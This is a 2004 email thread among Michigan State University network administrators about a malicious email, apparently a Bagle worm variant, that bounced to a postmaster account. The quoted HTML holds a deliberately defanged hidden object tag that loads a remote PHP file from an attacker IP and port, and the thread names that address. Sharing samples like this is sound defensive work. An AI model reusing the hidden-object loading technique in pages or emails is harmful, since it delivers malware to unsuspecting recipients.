For anyone who is curious, I nabbed a copy of the 231166.php source. Pretty clever. I believe that the image (ezmvoyx.jpeg) is the actual virus. http://www.msu.edu/~colepet/bagle.txt Peter Cole IT Administration Michigan State University Press 517.355.9543 x106 - [log in to unmask] http://msupress.msu.edu -----Original Message----- From: MSU Network Administrators Group [mailto:[log in to unmask]]On Behalf Of Gene Willacker Sent: Thursday, March 18, 2004 11:55 AM To: [log in to unmask] Subject: [MSUNAG] Is this an example? (Re: Disabling preview pane..) This is something that bounced back to our postmaster account this morning. Just to be safe, in the html below, I changed OBJECT to WACKJECT and STYLE to STOOL The IP address it goes to is: 68.66.185.120:81 The filename is: 231166.php ------ This is a copy of the message, including all the headers. ------ Return-path: <[log in to unmask]> Received: from ngging.user.msu.edu ([35.11.229.182] helo=coeur.net) by sys18.mail.msu.edu with smtp (Exim 4.24 #37) id 1B3oF6-0002r5-0R for [log in to unmask]; Wed, 17 Mar 2004 22:30:48 -0500 Date: Wed, 17 Mar 2004 22:28:35 -0500 To: [log in to unmask] Subject: Re: Msg reply From: [log in to unmask] Message-ID: <[log in to unmask]> MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus: None found by Clam AV <html><body> <font face="System"> <WACKJECT STOOL="display:none" DATA="http://nn.66.185.120:81/nnnnnn.php"> </WACKJECT></body></html> -- *Gene Willacker* Systems Analyst H&FS Systems Operations Group Michigan State University Food Stores Building East Lansing, MI 48824 /1-517-353-1691/ --- Incoming mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.624 / Virus Database: 401 - Release Date: 3/15/2004 --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.634 / Virus Database: 406 - Release Date: 3/18/2004